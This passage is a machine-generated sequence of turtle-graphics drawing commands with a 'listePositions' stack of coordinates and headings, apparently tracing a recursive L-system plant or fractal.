listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((184.46,136.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((200.46,136.63), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.46,136.63)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((200.46,136.63), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.46,136.63)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((215.24,130.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((215.24,130.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((215.24,130.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((215.24,130.50)), setheading(337.5) ;
pu(), setposition((169.68,130.50)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((184.46,136.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((184.46,136.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((199.24,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((199.24,142.75)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((214.02,136.63), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.02,136.63)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((214.02,136.63), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.02,136.63)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((230.02,136.63), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.02,136.63)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((230.02,136.63), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.02,136.63)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((244.80,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.80,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((244.80,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((244.80,142.75)), setheading(22.5) ;
pu(), setposition((199.24,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((210.55,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.55,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((210.55,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.55,154.06)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((225.34,160.18), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.34,160.18)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((225.34,160.18), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((225.34,160.18)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((241.34,160.18), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.34,160.18)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5), ((241.34,160.18), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.34,160.18)), setheading(0.0) ;
pu(), setposition((199.24,142.75)), setheading(22.5) ;
pu(), setposition((108.11,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((146.74,165.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((146.74,165.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((161.52,171.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((161.52,171.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((161.52,171.50)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((172.83,182.81), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 22.5), ((172.83,182.81), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((172.83,182.81)), setheading(45.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((136.86,180.16), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((136.86,180.16), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((136.86,180.16)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((148.18,191.47), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((148.18,191.47), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((148.18,191.47)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((162.96,197.59), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((130.74,165.38), 45.0), ((162.96,197.59), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((162.96,197.59)), setheading(22.5) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((145.52,171.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.52,171.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((145.52,171.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((145.52,171.50)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.30,177.62)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((160.30,177.62)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((175.09,171.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((175.09,171.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((175.09,171.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((175.09,171.50)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((191.09,171.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.09,171.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((191.09,171.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.09,171.50)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((205.87,177.62), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.87,177.62)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 0.0), ((205.87,177.62), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.87,177.62)), setheading(22.5) ;
pu(), setposition((160.30,177.62)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((171.62,188.94), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.62,188.94)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((171.62,188.94), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.62,188.94)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((186.40,195.06), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((186.40,195.06)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((186.40,195.06), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((186.40,195.06)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((202.40,195.06), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.40,195.06)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((160.30,177.62), 22.5), ((202.40,195.06), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((202.40,195.06)), setheading(0.0) ;
pu(), setposition((160.30,177.62)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((176.30,177.62), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.30,177.62)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((176.30,177.62), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.30,177.62)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.30,177.62)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.30,177.62)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((203.62,166.31), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.62,166.31)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((203.62,166.31), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.62,166.31)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((218.40,160.18), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.40,160.18)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((218.40,160.18), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.40,160.18)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((234.40,160.18), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((234.40,160.18)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 337.5), ((234.40,160.18), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((234.40,160.18)), setheading(0.0) ;
pu(), setposition((192.30,177.62)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((207.09,183.74), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.09,183.74)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((207.09,183.74), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.09,183.74)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((223.09,183.74), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((223.09,183.74)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((223.09,183.74), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((223.09,183.74)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((237.87,177.62), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.87,177.62)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((192.30,177.62), 0.0), ((237.87,177.62), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.87,177.62)), setheading(337.5) ;
pu(), setposition((192.30,177.62)), setheading(0.0) ;
pu(), setposition((108.11,142.75)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((119.43,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((119.43,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((130.74,165.38)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((146.74,165.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((130.74,165.38), 22.5), ((146.74,165.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((146.74,165.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
